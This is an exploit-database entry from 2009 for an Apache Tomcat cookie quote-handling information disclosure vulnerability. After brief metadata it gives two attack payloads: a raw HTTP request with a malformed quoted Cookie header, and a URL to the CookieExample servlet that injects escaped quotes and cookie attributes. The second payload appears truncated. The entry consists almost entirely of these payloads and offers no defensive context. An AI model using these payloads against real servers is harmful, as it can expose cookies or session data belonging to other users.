Apache Tomcat Cookie Quote Handling Remote Information Disclosure

2009-11-09T00:00:00
ID 1337DAY-ID-9581
Type zdt
Reporter John Kew
Modified 2009-11-09T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ===============================================================================
Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
===============================================================================


# Title: Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
# CVE-ID: ()
# OSVDB-ID: ()
# Author: John Kew
# Published: 2009-11-09
# Verified: yes

view source
print?
The following examples are available:
 
+++
GET /myapp/MyCookies HTTP/1.1
Host: localhost
Cookie: name="val " ue"
Cookie: name1=moi
+++
 
http://www.example.com/examples/servlets/servlet/CookieExample?cookiename=test&cookievalue=test%5c%5c%22%3B+Expires%3DThu%2C+1+Jan+2009+00%3A00%3A01+UTC%
3B+Path%3D%2Fservlets-examples%2Fservlet+%3



#  0day.today [2018-01-05]  #